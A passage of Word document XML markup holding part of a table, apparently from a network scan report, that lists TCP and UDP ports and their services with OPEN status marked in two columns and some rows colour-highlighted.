          </w:tcPr>
          <w:p w14:paraId="55C147FC" w14:textId="6C97A1B0" w:rsidR="003B6230" w:rsidRPr="00D644ED" w:rsidRDefault="003B6230" w:rsidP="00B66E87">
            <w:pPr>
              <w:keepLines/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>109/tcp (pop2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
          </w:tcPr>
          <w:p w14:paraId="018D91E5" w14:textId="77777777" w:rsidR="003B6230" w:rsidRDefault="003B6230" w:rsidP="00D644ED"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
          </w:tcPr>
          <w:p w14:paraId="2F22BC75" w14:textId="4C1B6D27" w:rsidR="003B6230" w:rsidRDefault="00390EF6" w:rsidP="00D644ED">
            <w:r>
              <w:t>OPEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B6230" w14:paraId="7F2BB393" w14:textId="77777777" w:rsidTr="00B66E87">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="626DE6E4" w14:textId="1022E130" w:rsidR="003B6230" w:rsidRPr="00D644ED" w:rsidRDefault="003B6230" w:rsidP="00B66E87">
            <w:pPr>
              <w:keepLines/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>110/tcp (pop3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
          </w:tcPr>
          <w:p w14:paraId="7DB63B96" w14:textId="77777777" w:rsidR="003B6230" w:rsidRDefault="003B6230" w:rsidP="00D644ED"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5318F2E9" w14:textId="53375439" w:rsidR="003B6230" w:rsidRDefault="00390EF6" w:rsidP="00D644ED">
            <w:r>
              <w:t>OPEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B6230" w14:paraId="02F9F3ED" w14:textId="77777777" w:rsidTr="00B66E87">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A9513ED" w14:textId="2525B8D8" w:rsidR="003B6230" w:rsidRPr="00D644ED" w:rsidRDefault="003B6230" w:rsidP="00B66E87">
            <w:pPr>
              <w:keepLines/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>111/tcp (rpcbind)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72D7918C" w14:textId="3F71FD05" w:rsidR="003B6230" w:rsidRDefault="00390EF6" w:rsidP="00D644ED">
            <w:r>
              <w:t>OPEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52F7AECE" w14:textId="0CA6ED7F" w:rsidR="003B6230" w:rsidRDefault="00390EF6" w:rsidP="00D644ED">
            <w:r>
              <w:t>OPEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B6230" w14:paraId="5B023F0C" w14:textId="77777777" w:rsidTr="00B66E87">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A0F6B77" w14:textId="3330F81B" w:rsidR="003B6230" w:rsidRPr="00D644ED" w:rsidRDefault="003B6230" w:rsidP="00B66E87">
            <w:pPr>
              <w:keepLines/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>143/tcp (imap)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
          </w:tcPr>
          <w:p w14:paraId="62FB122D" w14:textId="77777777" w:rsidR="003B6230" w:rsidRDefault="003B6230" w:rsidP="00D644ED"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54F52110" w14:textId="7AF1CBFE" w:rsidR="003B6230" w:rsidRDefault="00390EF6" w:rsidP="00D644ED">
            <w:r>
              <w:t>OPEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B6230" w14:paraId="726B03C8" w14:textId="77777777" w:rsidTr="00B66E87">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0039A035" w14:textId="78AB0224" w:rsidR="003B6230" w:rsidRPr="00D644ED" w:rsidRDefault="003B6230" w:rsidP="00B66E87">
            <w:pPr>
              <w:keepLines/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>199/tcp (smux)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
          </w:tcPr>
          <w:p w14:paraId="17C9E95B" w14:textId="77777777" w:rsidR="003B6230" w:rsidRDefault="003B6230" w:rsidP="00D644ED"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3809FE3C" w14:textId="292BCB95" w:rsidR="003B6230" w:rsidRDefault="00390EF6" w:rsidP="00D644ED">
            <w:r>
              <w:t>OPEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B6230" w14:paraId="6D903E63" w14:textId="77777777" w:rsidTr="00B66E87">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E7D1482" w14:textId="537E1337" w:rsidR="003B6230" w:rsidRPr="00D644ED" w:rsidRDefault="003B6230" w:rsidP="00B66E87">
            <w:pPr>
              <w:keepLines/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>443/tcp (https)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
          </w:tcPr>
          <w:p w14:paraId="60EFF1B3" w14:textId="77777777" w:rsidR="003B6230" w:rsidRDefault="003B6230" w:rsidP="00D644ED"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7018415B" w14:textId="102DD3CC" w:rsidR="003B6230" w:rsidRDefault="00390EF6" w:rsidP="00D644ED">
            <w:r>
              <w:t>OPEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B6230" w14:paraId="503BBAB7" w14:textId="77777777" w:rsidTr="00B66E87">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DCEE2EC" w14:textId="26B413CD" w:rsidR="003B6230" w:rsidRDefault="003B6230" w:rsidP="00B66E87">
            <w:pPr>
              <w:keepLines/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>669/tcp (meregister)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EF8F832" w14:textId="0389258B" w:rsidR="003B6230" w:rsidRDefault="00390EF6" w:rsidP="00D644ED">
            <w:r>
              <w:t>OPEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
          </w:tcPr>
          <w:p w14:paraId="405677B9" w14:textId="77777777" w:rsidR="003B6230" w:rsidRDefault="003B6230" w:rsidP="00D644ED"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B6230" w14:paraId="6A341D4F" w14:textId="77777777" w:rsidTr="00B66E87">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51B63F65" w14:textId="65686BBF" w:rsidR="003B6230" w:rsidRPr="00D644ED" w:rsidRDefault="003B6230" w:rsidP="00B66E87">
            <w:pPr>
              <w:keepLines/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>993/tcp (imaps)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
          </w:tcPr>
          <w:p w14:paraId="5187B37E" w14:textId="77777777" w:rsidR="003B6230" w:rsidRDefault="003B6230" w:rsidP="00D644ED"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DFDBC78" w14:textId="4922E338" w:rsidR="003B6230" w:rsidRDefault="00390EF6" w:rsidP="00D644ED">
            <w:r>
              <w:t>OPEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B6230" w14:paraId="2F32E0B2" w14:textId="77777777" w:rsidTr="00B66E87">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6C55581B" w14:textId="71FA7B24" w:rsidR="003B6230" w:rsidRPr="00D644ED" w:rsidRDefault="003B6230" w:rsidP="00B66E87">
            <w:pPr>
              <w:keepLines/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>995/tcp (pop3s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
          </w:tcPr>
          <w:p w14:paraId="30685FC4" w14:textId="77777777" w:rsidR="003B6230" w:rsidRDefault="003B6230" w:rsidP="00D644ED"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2F2EBDC4" w14:textId="5A73B854" w:rsidR="003B6230" w:rsidRDefault="00390EF6" w:rsidP="00D644ED">
            <w:r>
              <w:t>OPEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B6230" w14:paraId="44C098DF" w14:textId="77777777" w:rsidTr="00B66E87">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
          </w:tcPr>
          <w:p w14:paraId="4DE2D3FF" w14:textId="3152FE7A" w:rsidR="003B6230" w:rsidRPr="00D644ED" w:rsidRDefault="003B6230" w:rsidP="00B66E87">
            <w:pPr>
              <w:keepLines/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>1015/tcp (unknown)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
          </w:tcPr>
          <w:p w14:paraId="1A779A2B" w14:textId="77777777" w:rsidR="003B6230" w:rsidRDefault="003B6230" w:rsidP="00D644ED"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
          </w:tcPr>
          <w:p w14:paraId="79622208" w14:textId="24735851" w:rsidR="003B6230" w:rsidRDefault="00390EF6" w:rsidP="00D644ED">
            <w:r>
              <w:t>OPEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B6230" w14:paraId="5701101B" w14:textId="77777777" w:rsidTr="00B66E87">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2BB5888B" w14:textId="57F96576" w:rsidR="003B6230" w:rsidRPr="00D644ED" w:rsidRDefault="003B6230" w:rsidP="00B66E87">
            <w:pPr>
              <w:keepLines/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>6000/tcp (X11)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
          </w:tcPr>
          <w:p w14:paraId="400F0CFB" w14:textId="77777777" w:rsidR="003B6230" w:rsidRDefault="003B6230" w:rsidP="00D644ED"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C71DB91" w14:textId="780FE12E" w:rsidR="003B6230" w:rsidRDefault="00390EF6" w:rsidP="00D644ED">
            <w:r>
              <w:t>OPEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B6230" w14:paraId="27C3F550" w14:textId="77777777" w:rsidTr="00B66E87">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5ED3D21E" w14:textId="15B6433A" w:rsidR="003B6230" w:rsidRPr="00D644ED" w:rsidRDefault="003B6230" w:rsidP="00B66E87">
            <w:pPr>
              <w:keepLines/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>32768/tcp (filenet-tms)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
          </w:tcPr>
          <w:p w14:paraId="0C88E8AA" w14:textId="77777777" w:rsidR="003B6230" w:rsidRDefault="003B6230" w:rsidP="00D644ED"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B5284F7" w14:textId="143EA60A" w:rsidR="003B6230" w:rsidRDefault="00390EF6" w:rsidP="00D644ED">
            <w:r>
              <w:t>OPEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B6230" w14:paraId="6552DB8A" w14:textId="77777777" w:rsidTr="00B66E87">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="23A6C206" w14:textId="0C3DB601" w:rsidR="003B6230" w:rsidRPr="00D644ED" w:rsidRDefault="003B6230" w:rsidP="00B66E87">
            <w:pPr>
              <w:keepLines/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>32770/tcp (sometimes-rpc3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
          </w:tcPr>
          <w:p w14:paraId="5141D42C" w14:textId="77777777" w:rsidR="003B6230" w:rsidRDefault="003B6230" w:rsidP="00D644ED"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="65756FE7" w14:textId="427478B7" w:rsidR="003B6230" w:rsidRDefault="00390EF6" w:rsidP="00D644ED">
            <w:r>
              <w:t>OPEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B6230" w14:paraId="633EADA6" w14:textId="77777777" w:rsidTr="00B66E87">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
          </w:tcPr>
          <w:p w14:paraId="36BD292E" w14:textId="77777777" w:rsidR="003B6230" w:rsidRPr="00D644ED" w:rsidRDefault="003B6230" w:rsidP="00B66E87">
            <w:pPr>
              <w:keepLines/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
          </w:tcPr>
          <w:p w14:paraId="17DEEED0" w14:textId="77777777" w:rsidR="003B6230" w:rsidRDefault="003B6230" w:rsidP="00D644ED"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
          </w:tcPr>
          <w:p w14:paraId="5E7C57BC" w14:textId="77777777" w:rsidR="003B6230" w:rsidRDefault="003B6230" w:rsidP="00D644ED"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B6230" w14:paraId="602C7BC8" w14:textId="77777777" w:rsidTr="00B66E87">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="769897C9" w14:textId="614B1401" w:rsidR="003B6230" w:rsidRPr="00D644ED" w:rsidRDefault="003B6230" w:rsidP="00B66E87">
            <w:pPr>
              <w:keepLines/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>7/udp (echo)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
          </w:tcPr>
          <w:p w14:paraId="4EEB0B25" w14:textId="77777777" w:rsidR="003B6230" w:rsidRDefault="003B6230" w:rsidP="00D644ED"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A176FE5" w14:textId="0947EF55" w:rsidR="003B6230" w:rsidRDefault="00390EF6" w:rsidP="00D644ED">
            <w:r>
              <w:t>OPEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B6230" w14:paraId="48946AF5" w14:textId="77777777" w:rsidTr="00B66E87">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25958E76" w14:textId="184B5570" w:rsidR="003B6230" w:rsidRPr="00D644ED" w:rsidRDefault="003B6230" w:rsidP="00B66E87">
            <w:pPr>
              <w:keepLines/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>13/udp (daytime)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
          </w:tcPr>
          <w:p w14:paraId="57288BAC" w14:textId="77777777" w:rsidR="003B6230" w:rsidRDefault="003B6230" w:rsidP="00D644ED"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49832E4F" w14:textId="27B5441B" w:rsidR="003B6230" w:rsidRDefault="00390EF6" w:rsidP="00D644ED">
            <w:r>
              <w:t>OPEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B6230" w14:paraId="77273245" w14:textId="77777777" w:rsidTr="00B66E87">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00D8262E" w14:textId="1D1972D2" w:rsidR="003B6230" w:rsidRPr="00D644ED" w:rsidRDefault="003B6230" w:rsidP="00B66E87">
            <w:pPr>
              <w:keepLines/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>37/udp (time)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
          </w:tcPr>
          <w:p w14:paraId="6F838842" w14:textId="77777777" w:rsidR="003B6230" w:rsidRDefault="003B6230" w:rsidP="00D644ED"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="240F39C0" w14:textId="70028A6F" w:rsidR="003B6230" w:rsidRDefault="00390EF6" w:rsidP="00D644ED">
            <w:r>
              <w:t>OPEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B6230" w14:paraId="5D9275A5" w14:textId="77777777" w:rsidTr="00B66E87">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="35C071C2" w14:textId="7456A08D" w:rsidR="003B6230" w:rsidRPr="00D644ED" w:rsidRDefault="003B6230" w:rsidP="00B66E87">
            <w:pPr>
              <w:keepLines/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>111/udp (rpcbind)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="49F55DAF" w14:textId="41556179" w:rsidR="003B6230" w:rsidRDefault="00390EF6" w:rsidP="00D644ED">
            <w:r>
              <w:t>OPEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6517CFF9" w14:textId="2C85C13B" w:rsidR="003B6230" w:rsidRDefault="00390EF6" w:rsidP="00D644ED">
            <w:r>
              <w:t>OPEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B6230" w14:paraId="19DDF4D5" w14:textId="77777777" w:rsidTr="00B66E87">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
          </w:tcPr>
          <w:p w14:paraId="56B83440" w14:textId="3A5A3F41" w:rsidR="003B6230" w:rsidRPr="00D644ED" w:rsidRDefault="003B6230" w:rsidP="00B66E87">
            <w:pPr>
              <w:keepLines/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>161/udp (snmp)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
          </w:tcPr>
          <w:p w14:paraId="28723FFC" w14:textId="77777777" w:rsidR="003B6230" w:rsidRDefault="003B6230" w:rsidP="00D644ED"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
          </w:tcPr>
          <w:p w14:paraId="420D78BE" w14:textId="2252C67B" w:rsidR="003B6230" w:rsidRDefault="00390EF6" w:rsidP="00D644ED">
            <w:r>
              <w:t>OPEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B6230" w14:paraId="012C45F2" w14:textId="77777777" w:rsidTr="00B66E87">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="730640C1" w14:textId="3C5E255E" w:rsidR="003B6230" w:rsidRPr="00D644ED" w:rsidRDefault="003B6230" w:rsidP="00B66E87">
            <w:pPr>
              <w:keepLines/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>631/udp (ipp)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
